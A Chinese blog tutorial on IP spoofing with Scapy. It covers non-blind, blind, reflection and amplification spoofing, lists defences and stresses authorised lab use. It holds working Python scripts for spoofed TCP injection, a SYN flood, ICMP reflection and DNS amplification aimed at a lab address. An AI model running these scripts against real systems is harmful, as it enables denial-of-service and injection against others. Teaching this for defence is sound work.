使用 Scapy 库编写 IP 地址欺骗攻击脚本

一、介绍

1.1 概述

IP地址欺骗(IP Spoofing)是一种网络攻击技术,攻击者伪造其数据包的源IP地址,使其看起来像是从其他合法地址发送的。这种技术常用于各种攻击中,例如DDoS攻击、Man-in-the-Middle(MITM)攻击和拒绝服务(DoS)攻击等。

1.2 攻击原理

IP地址欺骗的核心在于攻击者能够创建带有伪造源IP地址的IP数据包。当目标系统接收到这些数据包时,会误以为它们来自合法的来源,从而执行攻击者预期的操作。由于IP协议本身并不验证数据包的源地址,这种攻击变得相对容易实现。

1.3 具体类型

  1. 非盲欺骗(Non-blind Spoofing)

    • 攻击者能够看到目标系统和合法来源之间的通信。通过截获和分析数据包,攻击者可以伪造合法的IP地址并插入恶意数据包。
  2. 盲欺骗(Blind Spoofing)

    • 攻击者无法看到目标系统和合法来源之间的通信,只能猜测数据包的内容和序列号。盲欺骗通常用于攻击需要少量数据包的协议(如ICMP和UDP)。
  3. 反射攻击(Reflection Attack)

    • 攻击者伪造数据包的源IP地址,使其看起来像是来自目标系统,并将这些数据包发送到第三方服务器。第三方服务器会将响应数据包发送到目标系统,形成反射攻击。
  4. 放大攻击(Amplification Attack)

    • 类似于反射攻击,但利用能够产生大响应的数据包服务(如DNS和NTP),使目标系统收到大量响应数据包,从而导致资源耗尽。

1.4 防御措施

  1. 反向路径转发(Reverse Path Forwarding, RPF)

    • 在路由器上启用RPF检查,确保数据包的源地址与预期路径匹配。若不匹配,则丢弃数据包。
  2. 访问控制列表(ACL)

    • 在网络设备上配置ACL,限制哪些IP地址可以发送数据包到特定的网络资源。
  3. 入侵检测和防御系统(IDS/IPS)

    • 部署IDS/IPS,实时监控网络流量,检测并阻止异常的流量模式和伪造的数据包。
  4. 网络防火墙

    • 配置防火墙规则,过滤异常的IP地址和不合法的源IP地址。
  5. 网络分段

    • 使用虚拟局域网(VLAN)技术将网络分段,减少欺骗攻击的影响范围。

二、实验环境

受害者:192.168.134.148

三、实操演示

3.1 非盲欺骗(Non-blind Spoofing)

在非盲欺骗中,攻击者能够看到目标系统和合法来源之间的通信,因此可以伪造合法IP地址并插入恶意数据包。

实验步骤:

  1. 设置环境

    • 攻击者设备能够嗅探目标设备的通信。
    • 使用Wireshark或类似工具观察目标设备和合法来源之间的通信。
  2. 捕获合法数据包

    • 捕获目标设备和合法来源之间的通信,特别是TCP连接建立过程(SYN, SYN-ACK, ACK)。
  3. 插入伪造数据包

    • 使用Scapy构造带有合法序列号和确认号的TCP数据包。
from scapy.all import *
from scapy.layers.inet import TCP


def non_blind_spoofing(target_ip, spoofed_ip, target_port, seq_num, ack_num):
    packet = IP(src=spoofed_ip, dst=target_ip) / TCP(sport=12345, dport=target_port, seq=seq_num, ack=ack_num, flags="PA") / b"Non-blind spoofing attack"
    send(packet)


if __name__ == "__main__":
    target_ip = "192.168.134.148"  # 目标系统的IP地址
    spoofed_ip = "192.168.1.1"   # 伪造的源IP地址
    target_port = 80             # 目标系统开放的端口
    seq_num = 1000               # 合法通信中捕获的序列号
    ack_num = 1001               # 合法通信中捕获的确认号
    non_blind_spoofing(target_ip, spoofed_ip, target_port, seq_num, ack_num)

这里的话其实开两台主机通信效果最明显 

3.2 盲欺骗(Blind Spoofing)

在盲欺骗中,攻击者无法看到目标系统和合法来源之间的通信,只能猜测数据包的内容和序列号。这里使用ICMP协议进行简单的盲欺骗示例。 

实验步骤:

  1. 发送大量伪造SYN数据包
    • 使用Scapy发送大量带有伪造源IP地址的SYN数据包。
from scapy.all import *
import random
from scapy.layers.inet import TCP


def blind_spoofing(target_ip, target_port):
    for _ in range(100):  # 发送100个伪造的SYN数据包
        spoofed_ip = "192.168.1." + str(random.randint(1, 254))
        packet = IP(src=spoofed_ip, dst=target_ip) / TCP(sport=random.randint(1024, 65535), dport=target_port, flags="S")
        send(packet)


if __name__ == "__main__":
    target_ip = "192.168.134.148"  # 目标系统的IP地址
    target_port = 80             # 目标系统开放的端口
    blind_spoofing(target_ip, target_port)

3.3 反射攻击(Reflection Attack)

反射攻击利用中间服务器(反射器)将攻击数据包反射回目标系统。攻击者伪造数据包的源IP地址,使其看起来像是来自目标系统,并将数据包发送到第三方服务器。

from scapy.all import *
from scapy.layers.inet import ICMP


def reflection_attack(target_ip, reflector_ip):
    # 发送多个ICMP Echo请求包
    for _ in range(10):  # 发送10个反射攻击包
        packet = IP(src=target_ip, dst=reflector_ip) / ICMP() / b"Reflection attack"
        send(packet)
        print(f"Sent packet to {reflector_ip} with spoofed source {target_ip}")


if __name__ == "__main__":
    target_ip = "192.168.134.148"  # 目标系统的IP地址
    reflector_ip = "192.168.134.147"     # 反射器的IP地址,例如公共DNS服务器
    reflection_attack(target_ip, reflector_ip)

3.4 放大攻击(Amplification Attack)

放大攻击利用能够产生大响应的数据包服务(如DNS和NTP),使目标系统收到大量响应数据包,从而导致资源耗尽。以下示例展示了如何通过伪造源IP地址来实现DNS放大攻击。

from scapy.all import *
from scapy.layers.dns import DNS, DNSQR
from scapy.layers.inet import UDP


def amplification_attack(target_ip, dns_server_ip):
    # 构造DNS查询请求
    dns_request = IP(src=target_ip, dst=dns_server_ip) / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname="www.hubstc.com.cn"))
    for _ in range(10):  # 发送10个放大攻击包
        send(dns_request)
        print(f"Sent DNS request to {dns_server_ip} with spoofed source {target_ip}")


if __name__ == "__main__":
    target_ip = "192.168.134.148"    # 目标系统的IP地址
    dns_server_ip = "192.168.134.147"      # 公共DNS服务器的IP地址
    amplification_attack(target_ip, dns_server_ip)

四、注意事项

  1. 合法性和道德规范:确保在合法和授权的环境中进行实验,不得在未经授权的网络上进行IP地址欺骗实验。
  2. 网络隔离:确保实验网络与生产网络隔离,避免对实际业务造成影响。
  3. 监控与恢复:实验过程中实时监控网络和系统状态,实验结束后立即停止攻击工具,并确保系统恢复正常。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/669273.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

271 基于matlab的可调Q因子小波变换故障诊断

基于matlab的可调Q因子小波变换故障诊断,可用在轴承、齿轮、活塞等故障诊断中,程序中包含了原始TQWT工具箱和轴承振动信号信号的谱包络的求取。通过仿真数据、实际轴承数据说明了方法的效果。程序已调通,可直接运行。 271 可调Q因子小波变换 …

算法第三天力扣第69题:X的平方根

69. x 的平方根 (可点击下面链接或复制网址进行做题) https://leetcode.cn/problems/sqrtx/https://leetcode.cn/problems/sqrtx/ 给你一个非负整数 x ,计算并返回 x 的 算术平方根 。 由于返回类型是整数,结果只保留 整数部分 ,小数部分将被 舍去 。 注意:不允许使用任何内…

Gavin Wood 访谈|Polkadot 从何而来,又将如何面对 AI 时代?

如果没有宏观经济,加密世界可能无法存在。或许,Satoshi Nakamoto 也永远不会写出那篇开创性的白皮书。区块链技术作为指数时代的核心之一,在宏观经济理论中占有重要地位。传统的经济增长公式是人口增长加生产率增长加债务增长。然而&#xff…

32【Aseprite 作图】石头——拆解

1 石头先画轮廓,还是2 4 1 1 2 2 2,这样画一个圆的轮廓 或者2 1 1 3 5 1 1 1 1 2 4 , 2 最暗一层的黑色,做阴影部分,就是7 4 3 2 做最深的部分 各个地方画一些浅色的,做高光部分,上面的高光偏圆…

依赖管理包介绍

文章目录 1. 概念介绍2. 思路与方法2.1 实现思路2.2 相关组件 3. 示例代码4. 内容总结 我们在上一章回中介绍了"使用get进行依赖管理"相关的内容,本章回中将介绍如何使用get进行状态管理一.闲话休提,让我们一起Talk Flutter吧。 1. 概念介绍 …

【计算机毕设】SpringBoot海滨体育馆管理系统设计与实现 - 源码免费(私信领取)

免费领取源码 | 项目完整可运行 | v:chengn7890 诚招源码校园代理! 1. 引言 体育馆作为重要的体育场馆,承担着举办体育赛事、健身活动和文化演出等多种功能。为了提高体育馆的管理效率和服务质量,本项目旨在…

2024-05-31 blue-VH-driver-问题分析-有状态的服务-状态的处理

摘要: VH的driver对上层提供的接口,是会保持状态。这个状态,可以分为,查询的数据的状态,主要是为了提供翻页查询的功能。另一种状态,就是订阅。 有状态的服务: 状态是什么? 其实从调用方的角度更好的理解&#xff0c…

进程与线程(三)

进程与线程(三) 进程间通信传统间的进程间通信机制无名管道无名管道的特征无名管道的创建父子进程通信测试管道的大小管道读写易出现的问题 有名管道创建有名管道有名管道的写端代码有名管道的读端代码 信号信号的特征产生信号硬件来源软件来源发送信号的…

【MATLAB】概述1

非 ~ 注释 % 定义 >> 数组 赋值 赋值:>> x1 函数 数组 x[x1,x2] 行向量(,or ) x[x1;x2] 列向量 x. 转置等间隔向量 1-10 向量:>>xlinspace(1,10,10) 矩阵 矩阵:>>A[1,2,3;4,5,6;7,8,9] …

重生之 SpringBoot3 入门保姆级学习(10、日志基础与使用)

重生之 SpringBoot3 入门保姆级学习(10、日志基础使用) 3.1 日志基础3.2 使用日志3.2.1 基础使用3.2.2 调整日志级别3.2.3 带参数的日志 3.1 日志基础 SpringBoot 默认使用 SLF4j(Simple Logging Facade for Java)和 Logback 实现…

Django ORM魔法:用Python代码召唤数据库之灵!

探索Django ORM的神奇世界,学习如何用Python代码代替复杂的SQL语句,召唤数据库之灵,让数据管理变得轻松又有趣。从基础概念到高级技巧,阿佑带你一步步成为Django ORM的魔法师,让你的应用开发速度飞起来! 文…

Adobe Acrobat DC无法卸载

控制版面、电脑管家等均无法卸载,使用自身的remove也不能卸载 解决方法:删除Adobe Acrobat DC的注册表 1、首先打开注册列表: 2、根据圈出来的信息,找到以下路径: 计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Inst…

c++车票管理系统

这里写自定义目录标题 c车票管理系统vx:sredxc车票管理系统初始页面,需要源码vx:sredxc新增车票信息查询车票信息代码包含完整的发布车票信息,购票,退票,票数检测,余票检测,车票查询等功能 c车票管理系统vx:sredxc 这段代码实现了一个简单的高铁票务管理系统,具有以…

动态路由OSPF单区域和多区域配置实验

动态路由OSPF的配置 OSPF分类两种情况:单区域 多区域路由 OSPF单区域路由配置 OSPF:开放最短路径优先的路由协议。属于大型动态路由协议,适用于中大型的园区网。 网络拓扑: 配置步骤: 1.完成基本配置(略&…

如何在测试/线上环境页面访问本地接口?

文章目录 一、前言二、分析三、搭建1、搭建nginx,监听http请求转发2、监听https请求转发 四、总结 一、前言 在工作中,开发完的接口,一般测试的话,基本是使用Postman,如果要到页面测试,就要发版进行测试&a…

5.29工效学-人因工程人机交互

对于工效学这门课,一直都感觉很有意思,是一个值得再认真一点的课。可惜上课的时候效率不高,有感兴趣的东西课后也没有自行去拓展开来,前面的课我感觉还讲了比较重要的东西,但是,全忘了呢(真的对…

8、资源操作 Resource

目录 8.1、Spring Resources概述补充:什么是 low-level 资源?1. 文件系统资源2. 类路径资源3. URL资源4. 内嵌资源5. InputStream资源6. ServletContext资源示例代码结论 8.2、Resource接口8.3、Resource的实现类8.3.1、UrlResource访问网络资源1&#x…

华为设备配置静态路由和默认路由

华为设备配置静态路由和默认路由 理论部分知识: 路由分为两个大类:静态路由-----动态路由 静态路由:手工指定,适用于小规模的网络应用场景,如果网络规模变大,这样的方式非常不适合而且容易出错。 语法&…

C#使用GDI对一个矩形进行任意角度旋转

C#对一个矩形进行旋转GDI绘图,可以指定任意角度进行旋转 我们可以认为一张图片Image,本质就是一个矩形Rectangle,旋转矩形也就是旋转图片 在画图密封类 System.Drawing.Graphics中, 矩形旋转的两个关键方法 //设置旋转的中心点 public v…

初识C++ · 模拟实现list

目录 前言 1 push_back pop_back 2 迭代器类 2.1 ! 2.2 -- 2.3 * 3 Print_List 4 有关自定义类型 5 有关const迭代器 6 拷贝构造 赋值 析构 Insert erase 前言 有了string,vector的基础,我们模拟实现list还是比较容易的,这里同…